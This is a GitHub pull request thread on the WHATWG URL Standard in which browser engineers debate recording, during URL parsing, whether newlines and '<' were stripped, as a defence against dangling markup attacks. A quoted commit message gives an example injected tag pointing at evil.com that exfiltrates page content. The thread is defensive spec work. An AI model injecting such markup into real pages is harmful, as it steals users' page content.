Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Record whether the URL parser removed newlines. #284

Closed
wants to merge 4 commits into from
Closed

Record whether the URL parser removed newlines. #284

wants to merge 4 commits into from

Conversation

mikewest
Copy link
Member

@mikewest mikewest commented Mar 28, 2017

In order to support checks like those sketched out in 1, it would
be helpful to record at parse-time whether or not tabs and newline
characters were stripped from a given URL. This patch does so by
adding a cleverly-named flag that could be referenced from other
specifications. Fetch, for instance.


Preview | Diff

@annevk
Copy link
Member

annevk commented Mar 28, 2017

Apart from nits this looks reasonable. I'm guessing it's fine to leave this as a PR until there's also Fetch integration, tests, and hopefully interest from more implementers?

@annevk annevk added needs implementer interest Moving the issue forward requires implementers to express interest needs tests Moving the issue forward requires someone to write tests topic: parser labels Mar 28, 2017
mikewest added a commit to whatwg/fetch that referenced this pull request Mar 28, 2017
As a mitigation against dangling markup attacks (which inject open tags like
`<img src='https://evil.com/` that eat up subsequent markup, and exfiltrate
content to an attacker), this patch tightens request processing to reject
those that contain a `<` character (consistent with an HTML element), _and_
had newline characters stripped during URL parsing (see whatwg/url#284).

It might be possible to URLs whose newline characters were stripped entirely,
based on initial metrics. If those pan out the way I hope, we can tighten
this up in the future.
@mikewest
Copy link
Member Author

Updated with a less-than flag, as discussed in whatwg/fetch#519.

@achristensen07
Copy link
Collaborator

I'm ok with having a conceptual reference to something like this, but I don't think this necessarily belongs in the URL spec and I would be quite opposed to exposing this to JavaScript or something like that. WebKit's implementation doesn't actually spend the extra time to look through the URL twice to check for tabs or newlines, and we should make it as straightforward as possible to implement efficient URL parsers.

@annevk
Copy link
Member

annevk commented May 23, 2017

@achristensen07 where would it belong? You can't do it after-the-fact since then newlines are gone and > is percent-encoded (and I don't think you want to fail fetching on the percent-encoded variant, that'd just be wrong).

It would be observable to JavaScript through due to the Fetch integration. Implementing this in a single-pass implementation seems relatively straightforward though if you already do whitespace removal that way already.

@annevk
Copy link
Member

annevk commented May 23, 2017

Do we want these flags to remain independent? If they're only ever used together...

@achristensen07
Copy link
Collaborator

I guess it might not be completely catastrophic to add some code in all the unlikely cases of branches if a tab or newline is hit. I'm also concerned about adding another bool to a URL object which ought to remain simple and small, but maybe the slippery slope argument won't be enough to stop this.
I also think it's a bad idea to put something that blocks content that looks like an attack into the fetch spec, but that's an argument to be had there.

@mikewest
Copy link
Member Author

WebKit's implementation doesn't actually spend the extra time to look through the URL twice to check for tabs or newlines, and we should make it as straightforward as possible to implement efficient URL parsers.

I believe putting this into URL makes it possible for us to avoid walking through the URL twice. As @annevk notes, after parsing the URL, the data we're looking for is actually unavailable. We'd have to have a pre-processing step in various callsites in HTML (basically wrapping the URL parsing call with something that holds a variable), which is certainly doable, but strange.

We're already walking through the URL once to remove newlines; recording that state then seems reasonable.

Do we want these flags to remain independent? If they're only ever used together...

Yeah. I realized this while playing with an implementation in Chrome; I'll update this patch accordingly.

@mikewest
Copy link
Member Author

I guess it might not be completely catastrophic to add some code in all the unlikely cases of branches if a tab or newline is hit.

What does WebKit's implementation of newline removal look like now? Do y'all just farm out to NSURL?

I'm also concerned about adding another bool to a URL object which ought to remain simple and small, but maybe the slippery slope argument won't be enough to stop this.

As written here, the flag isn't exposed to the web (except implicitly via the Fetch behavior, as @annevk notes). I agree that it doesn't seem necessary to add a bool to the URL interface.

I also think it's a bad idea to put something that blocks content that looks like an attack into the fetch spec, but that's an argument to be had there.

Happy to have that discussion on the other patch: whatwg/fetch#519. Given that we're already doing things like https://fetch.spec.whatwg.org/#should-response-to-request-be-blocked-due-to-mime-type? there, this doesn't seem like much of a stretch, but I'm interested in hearing about possible alternatives.

@mikewest
Copy link
Member Author

1ab78b5 changes the algorithm to bring it in line with what I expect implementations are doing today: copying non-tab/newline characters to a new string. Setting this flag turns into one extra if in that loop; we don't actually have to walk the whole string a second time.

WDYT?

@achristensen07
Copy link
Collaborator

A more efficient implementation can and has been done in https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/platform/URLParser.cpp
In the common case it will look at each code point in the input string once (except a bit of extra processing in the host), increment the unmodified ref-counted string, and store some offsets in an efficient data structure. Newline and tab checking is not done in a separate and simple loop, but rather every time the iterator on the input is incremented. All this is just an implementation detail and people can implement the spec however they see fit, but I oppose to adding necessary data fields and additional operations everywhere in efficient implementations of an algorithm, especially if the benefit is just to guess whether fetched data is malicious.

@mikewest
Copy link
Member Author

Newline and tab checking is not done in a separate and simple loop, but rather every time the iterator on the input is incremented.

That's a clever implementation, thanks for sharing the link!

I agree that it would be a little more work for y'all to get the behavior specced here, but I think you can still do it in a single pass. For example, I could imagine that the two-flag proposal from earlier in the thread might be reasonable:

++iterator;
while (UNLIKELY(!iterator.atEnd() && isTabOrNewline(*iterator))) {
    m_whitespaceEncountered = true;
    if (reportSyntaxViolation == ReportSyntaxViolation::Yes)
        syntaxViolation(iteratorForSyntaxViolationPosition);
    ++iterator;
}
if (UNLIKELY(*iterator == '<'))
  m_lessThanEncountered = true;

with a corresponding value on URL that you'd set in either URL's or URLParser's constructor after parsing. That comes at a cost of an extra if for every call to advance(), and three bools (two on URLParser and one on URL).

All this is just an implementation detail and people can implement the spec however they see fit, but I oppose to adding necessary data fields and additional operations everywhere in efficient implementations of an algorithm, especially if the benefit is just to guess whether fetched data is malicious.

I agree that the benefit is something we'd need to weigh against the performance costs, and that's a judgement call that I can't make for the WebKit project. From my perspective, dangling markup is a well-known and fairly soft target for attackers. As we continue to close off other avenues for code injection (via CSP and etc.) it's only going to increase in impact. Killing off a substantial portion of this class of attack seems like it's worth some cost to URL processing speed.

@domenic
Copy link
Member

domenic commented May 23, 2017

We'd have to have a pre-processing step in various callsites in HTML (basically wrapping the URL parsing call with something that holds a variable), which is certainly doable, but strange.

As written here, the flag isn't exposed to the web

I think it might be good to point this out in the spec, and further elaborate on the nature of this flag as not relevant for the general URL parsing behavior that the URL Standard mostly covers. I would phrase it as something like this:

NOTE: the potentially-dangling-markup flag is stored for later use by the HTML Standard to mitigate certain attack scenarios. Conceptually, it is not really a part of the URL record type, but is kept here for convenience. An alternate specification or implementation strategy would be that all invocations of the URL parser in HTML first scan the input string for the appropriate patterns, before performing the normal URL parsing algorithm. Implementations that do not plan to implement the relevant parts of the HTML Standard can ignore this flag and parts of the parsing algorithm that set it.

However in writing the above I realize I am confused. Is this a mitigation applied to Fetch, or to HTML? I think the PRs apply it to Fetch, right? (Unlike my above paragraph states.) Which means that attempting to do

new WebSocket(new URL(`wss://example.com/foo\nbar>baz`).href);

will fail, right? Are there tests for this (and for other non-HTML-markup-related URL parsing behaviors)? Is this even desirable? Maybe the specification layering where HTML wraps specific invocations of the URL parser would be better after all...

@mikewest
Copy link
Member Author

However in writing the above I realize I am confused. Is this a mitigation applied to Fetch, or to HTML? I think the PRs apply it to Fetch, right?

That's correct. It seems simplest to make the behavior consistent at the Fetch layer.

new WebSocket(new URL(`wss://example.com/foo\nbar>baz`).href);

This wouldn't fail, actually, because you're stringifying a parsed URL. That is, the result of new URL(...) would have set this flag, but the flag isn't represented in the stringification. So, the string passed into new WebSocket() contains neither < nor \n. new WebSocket(wss://example.com/foo\nbar>baz);, on the other hand, would be blocked.

Maybe the specification layering where HTML wraps specific invocations of the URL parser would be better after all...

Writing it that way is fine, if cumbersome because of all the call sites. I don't intend to implement it that way in Blink, however. As noted above, URL parsing is expensive, and I don't think there's much appetite for doing more loops through the string.

I understand that it's confusing to put a flag like this into URL if it's not used in URL, but if we put it somewhere else, I think we'd probably end up adding a note about how implementers should probably implement it as part of their URL parser. If you're happier with that as an outcome, I can type it up.

@domenic
Copy link
Member

domenic commented May 23, 2017

This wouldn't fail, actually, because you're stringifying a parsed URL.

Right, thanks. I guess I meant

new WebSocket(`wss://example.com/foo\nbar>baz`);

will fail. Again, is this desired behavior? Are there tests for it, and other cases like it?

@annevk
Copy link
Member

annevk commented May 23, 2017

If you're happier with that as an outcome, I can type it up.

I don't think I would be. Those kind of mismatches with implementations have the tendency to completely break down over time. We could still restrict though for which callsites the flag has an effect, but it's unclear if it's worth it.

@mikewest
Copy link
Member Author

Right, thanks. I guess I meant

new WebSocket(`wss://example.com/foo\nbar>baz`);

will fail. Again, is this desired behavior?

I think so, yes. If we're going to block raw \n and < in one context, it makes sense to block them in all contexts. Otherwise we're just introducing confusing distinctions.

Are there tests for it, and other cases like it?

I've added fetch tests to Chrome's tentative implementation of this behavior. Should be upstreamed shortly.

@mikewest
Copy link
Member Author

I don't think I would be. Those kind of mismatches with implementations have the tendency to completely break down over time.

FWIW, I agree. Doing things in URL makes much more sense to me.

We could still restrict though for which callsites the flag has an effect, but it's unclear if it's worth it.

I don't think that would be worthwhile, but if others do, I wouldn't strenuously object. :)

chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
whatwg/url#284 and
whatwg/fetch#519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <[email protected]>
Cr-Commit-Position: refs/heads/master@{#474249}
WPT-Export-Revision: 34b8d6ab689b1ecedef332baa2a155b543f50fa7
chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
whatwg/url#284 and
whatwg/fetch#519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Reviewed-by: Jochen Eisinger <[email protected]>
Cr-Commit-Position: refs/heads/master@{#474268}
WPT-Export-Revision: 76847294b106c9c50e921ac523722675102d452e
chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
whatwg/url#284 and
whatwg/fetch#519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <[email protected]>
Reviewed-by: Jochen Eisinger <[email protected]>
Cr-Commit-Position: refs/heads/master@{#474290}
WPT-Export-Revision: 9545e01418eb8738e5646b86527b986b3f2047a1
chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
whatwg/url#284 and
whatwg/fetch#519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <[email protected]>
Reviewed-by: Jochen Eisinger <[email protected]>
Cr-Commit-Position: refs/heads/master@{#474292}
WPT-Export-Revision: 8f0c33883ba9ad137a9ed9fe8a758022230f3e06
@achristensen07
Copy link
Collaborator

I think since this is trying to prevent an HTML parsing attack, it belongs in the HTML spec. I oppose to putting this in the URL spec. Strings in HTML are such a small subset of the uses of URLs.

@achristensen07
Copy link
Collaborator

Note: I don't oppose to preventing the attack. If I were to implement the attack prevention, I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser and search for this one attack in that one place. I think the spec could be more similar to that, and if we want to instead put concepts here then they should not change the behavior of all URL parsing or require more memory for all URLs.

chromium-wpt-export-bot pushed a commit to web-platform-tests/wpt that referenced this pull request May 24, 2017
Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
whatwg/url#284 and
whatwg/fetch#519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <[email protected]>
Reviewed-by: Jochen Eisinger <[email protected]>
Cr-Commit-Position: refs/heads/master@{#474341}
@mikewest
Copy link
Member Author

I think since this is trying to prevent an HTML parsing attack, it belongs in the HTML spec. I oppose to putting this in the URL spec. Strings in HTML are such a small subset of the uses of URLs.

Note: I don't oppose to preventing the attack. If I were to implement the attack prevention, I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser and search for this one attack in that one place. I think the spec could be more similar to that, and if we want to instead put concepts here then they should not change the behavior of all URL parsing or require more memory for all URLs.

I'm sympathetic to this, but if WebKit implemented something along these lines, wouldn't y'all do it in the URL parser? I don't think Blink would accept running through the string again. In fact, I know we wouldn't, because my first pass at adding metrics for this did three string scans when completing URLs, caused a ~30% drop in parsing performance on Android and triggered exciting alerts in my inbox (https://bugs.chromium.org/p/chromium/issues/detail?id=682300). :)

Given that it makes sense for the implementation to live in the URL parser, defining it there seems to also make sense.

@achristensen07
Copy link
Collaborator

Our URL object is used for many things in the operating system that have nothing to do with HTML parsing. We have many public APIs for apps that make URL objects behind the scenes, for example. We also do many things with the network that have nothing to do with HTML. We would not want to slow all those things down even by decreasing instruction locality by adding instructions in unlikely branches, and we would not want to require more memory for all those URL objects. If I implemented this change in WebKit, I would have to look into how performance is actually affected and consider many things, but my initial thought is that I would just pre-scan the String given from the HTML/SVG parser to the URL parser. As one of the probably majority of URL users that does things with URLs unrelated to HTML, I do not think this belongs in the URL specification.

MXEBot pushed a commit to mirror/chromium that referenced this pull request May 25, 2017
Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
whatwg/url#284 and
whatwg/fetch#519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <[email protected]>
Reviewed-by: Jochen Eisinger <[email protected]>
Cr-Commit-Position: refs/heads/master@{#474341}
@domenic
Copy link
Member

domenic commented May 25, 2017

I'm very sympathetic to @achristensen07's point of view conceptually. In particular I am very happy that WebKit uses these URL objects behind the scenes for all networking; that is exactly how it should be. But I want to try to tease out the concrete objection.

My take is that it should be an editorial decision (as in, up to the editor) as to where this field is stored---as long as the observable consequences are the same. I strongly urge the editor to include a note similar to mine in #284 (comment) (modified to talk about Fetch instead of HTML) so that people implementing this spec can understand that storing the flag inside the URL is a spec convenience, and they may want to make alternate implementation decisions (e.g. if they plan on flowing the URLs into places that are never Fetched).

However, what I am concerned about is whether we have cross-browser agreement on applying this mitigation, and particularly the scope of it, in terms of observable consequences. My understanding is that @achristensen07 "doesn't oppose" preventing the attack. But does that include preventing it for all other places URLs are parsed and then go through the Fetch spec, as the current set of patches do? His follow-up comment "I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser" implies he might not be on board with the full scope of the currently-proposed mitigation, which includes, as I said, everywhere a URL is parsed and then fed to Fetch. My go-to example in this thread has been new WebSocket(), but it will also include fetch(), XMLHttpRequest, payment method manifest fetching, etc. Not just fetches initiated by HTML tags.

So, @achristensen07 ---leaving editorial issues of how the spec is written aside (at least for now), what are your thoughts on the actual mitigation strategy proposed?

@mikewest
Copy link
Member Author

my initial thought is that I would just pre-scan the String given from the HTML/SVG parser to the URL parser

Running through every URL is expensive; as I noted above, a very naive implementation caused a ~30% regression in one of Blink's parsing benchmarks. I imagine a cleverer implementation would have less impact, but it seems non-negligible.

I could also imagine tagging the attribute as containing newlines and less-than characters during HTML tokenization/parsing, but that a) also seems expensive, and b) would require holding a boolean on each attribute, which seems more expensive than holding a boolean on a URL.

Do you have a different approach in mind, @achristensen07? I'm not at all philosophically tied to putting this into the URL parser, but it seems like the most efficient place to do the work, especially since we're already required to remove newline characters from URLs. Why not recognize other properties at the same time?

@achristensen07
Copy link
Collaborator

I think that mitigation of an HTML injection attack should go in the HTML spec. It is bad design to try and catch it at all the points of data entry into the HTML parser instead. What if someone dynamically generates a malicious HTML string with JavaScript, for example? I think it's also bad design to put more HTML concepts into the URL spec, which is used for non-HTML applications. If an implementer feels that they want to slow down their URL parser to implement it, then they can do that. I probably wouldn't.

@mikewest
Copy link
Member Author

I think that mitigation of an HTML injection attack should go in the HTML spec.

Let's say that we go this route, and alter https://html.spec.whatwg.org/#resolving-urls to scan the input string for characters we don't like. That seems fine in itself, and we could add a note to implementers about doing this work in parallel with whitespace removal if they feel like it (because, as we've both noted, scanning through every URL string is expensive). We could then look at the scheme of the resulting URL record and abort with a parse error for those URLs containing both character types and HTTP(S) schemes.

I think that would be somewhat equivalent to the current set of patches in the main set of cases that I care about (with the caveats that the errors would look different: TypeError in a few places as opposed to network errors), but has the strange side effect that APIs begin to behave differently depending on where they're defined. APIs like Worker are in HTML, and use HTML's "parse a URL" wrapper, so they'd exhibit the new behavior. APIs like fetch() and XHR do not use HTML's wrapper, so they wouldn't.

And actually, looking at HTML again, not everything there uses the wrapper: WebSocket uses the URL parser directly, for example. So I suppose we'd need to audit all the parsing usage to see what we think the behavior ought to be (and ensure that we do the same as new parsing usage is added). I think that would leave us with a fairly confusing story for developers.

@mikewest
Copy link
Member Author

@annevk: What would you like me to do here?

@annevk
Copy link
Member

annevk commented Jun 29, 2017

If we don't want to overload the generic URL parser we should figure out in which places this attack can take place (only HTML/SVG element attributes I assume?) and only apply the mitigation there. That might involve creating a new abstraction to invoke from these places.

In order to support checks like those sketched out in [1], it would
be helpful to record at parse-time whether or not tabs and newline
characters were stripped from a given URL. This patch does so by
adding a cleverly-named flag that could be referenced from other
specifications. Fetch, for instance.
malloxpb pushed a commit to scrapy/url-chromium that referenced this pull request Jul 12, 2018
Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
whatwg/url#284 and
whatwg/fetch#519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <[email protected]>
Reviewed-by: Jochen Eisinger <[email protected]>
Cr-Original-Commit-Position: refs/heads/master@{#474341}
Cr-Mirrored-From: https://chromium.googlesource.com/chromium/src
Cr-Mirrored-Commit: 9e5ae901660de47ef1b844c6113eae91b5ae8e9e
@annevk annevk closed this Jan 15, 2021
@annevk annevk deleted the branch whatwg:master January 15, 2021 07:41
@annevk
Copy link
Member

annevk commented Feb 15, 2021

Note that I think this got closed because @mikewest removed his fork and the default branch was renamed to main. This issue will continue to be tracked in whatwg/fetch#546.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
needs implementer interest Moving the issue forward requires implementers to express interest needs tests Moving the issue forward requires someone to write tests topic: parser
Development

Successfully merging this pull request may close these issues.

4 participants